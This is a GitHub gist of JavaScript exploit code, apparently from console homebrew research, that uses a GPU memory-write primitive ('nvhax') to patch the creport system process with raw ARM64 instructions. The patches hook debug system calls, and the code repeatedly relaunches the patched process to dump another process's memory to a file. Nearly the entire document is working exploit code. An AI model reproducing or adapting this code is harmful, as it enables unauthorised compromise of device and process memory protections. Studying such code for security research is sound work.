Created
December 28, 2018 19:52
-
-
Save hexkyz/b2897f27dbaf3e5a450b4bdc587fafa5 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sploitcore.prototype.nvhax_patch_creport = function(ch_base_addr, dram_addr, pid, mem_offset, mem_size) { | |
| var gpu_va = [0, 0x04]; | |
| var dram_base_addr = (dram_addr & 0xFFF00000); | |
| var dram_offset = (dram_addr & 0x000F0000); | |
| // Map GPU MMIO | |
| var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000); | |
| // Patch the channel with the base DRAM address | |
| var ch_iova = this.nvhax_patch_channel(ch_base_addr, dram_base_addr); | |
| // Write target PID somewhere | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x2A000), pid); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x2A008), 0); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x2A010), mem_size); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x2A018), mem_offset); | |
| // Replace "nnMain" branch | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x000D8), 0x9400595A); | |
| // Install svcDebugActiveProcess hook | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16640), 0x900000A4); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16644), 0xF9400081); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16648), 0xD4000C01); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1664C), 0x900000A4); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16650), 0xB9002080); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16654), 0xB9002481); | |
| // Install svcGetDebugEvent hook (process) | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16658), 0x900000A4); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1665C), 0x91010080); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16660), 0xB9402481); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16664), 0xD4000C61); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16668), 0x900000A4); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1666C), 0xB9003080); | |
| // Install svcGetDebugEvent hook (thread) | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16670), 0x900000A4); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16674), 0x91010080); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16678), 0xB9402481); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1667C), 0xD4000C61); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16680), 0x900000A4); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16684), 0xB9003080); | |
| // Install svcReadDebugProcessMemory hook | |
| if (mem_size == 0x4000) | |
| { | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16688), 0x90000064); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1668C), 0x91100080); | |
| } | |
| else | |
| { | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16688), 0xF0000044); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1668C), 0x91000080); | |
| } | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16690), 0x900000A4); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16694), 0xF9400C85); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16698), 0xF8424081); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1669C), 0xF9403082); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166A0), 0x8B050042); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166A4), 0xB9401083); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166A8), 0xD4000D41); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166AC), 0x900000A4); | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166B0), 0xB9007080); | |
| // Return | |
| this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166B4), 0xD65F03C0); | |
| return [gpu_io_vaddr, ch_iova]; | |
| } | |
| sploitcore.prototype.nvhax_dump_proc = function(sm_handle, ch_base_addr, pid, start_offset, end_offset, is_small) { | |
| var tmp_mem_buf = utils.add2(this.nvdrv_exp_ctx[6], 0x40000); | |
| var creport_tid = [0x00000036, 0x01000000]; | |
| var creport_dram_addr = 0x94950000; | |
| var data_gpu_va = [0x71000, 0x4]; | |
| var status_gpu_va = [0x7A000, 0x4]; | |
| var mem_offset = start_offset; | |
| var mem_size = 0x8000; | |
| var mem_read_state = 0; | |
| // Use smaller blocks instead | |
| if (is_small) | |
| { | |
| data_gpu_va = [0x72400, 0x4]; | |
| mem_size = 0x4000; | |
| } | |
| // Allocate memory buffer | |
| var mem_buf = this.malloc(mem_size); | |
| while (!mem_read_state && (mem_offset < end_offset)) | |
| { | |
| // Launch creport in waiting state | |
| var proc_pid = this.launch_proc(sm_handle, 0x03, creport_tid, "120", 0x02); | |
| // Patch creport | |
| var ctx_res = this.nvhax_patch_creport(ch_base_addr, creport_dram_addr, pid, mem_offset, mem_size); | |
| // Get context | |
| var gpu_io_vaddr = ctx_res[0]; | |
| var ch_iova = ctx_res[1]; | |
| // Start patched creport | |
| this.start_proc(sm_handle, proc_pid); | |
| // Copy memory into nvservices | |
| this.nvhax_dram_memcpy(gpu_io_vaddr, ch_iova, data_gpu_va, tmp_mem_buf, mem_size); | |
| // Copy memory from nvservices | |
| this.do_nvdrv_memcpy_out(mem_buf, tmp_mem_buf, mem_size); | |
| // Dump memory | |
| this.memdump(mem_buf, mem_size, "memdumps/dram.bin"); | |
| // Increase source memory offset | |
| mem_offset += mem_size; | |
| // Check debug SVC result | |
| mem_read_state = this.nvhax_peephole_read32(gpu_io_vaddr, ch_iova, utils.add2(status_gpu_va, 0x70)); | |
| } | |
| this.free(mem_buf); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment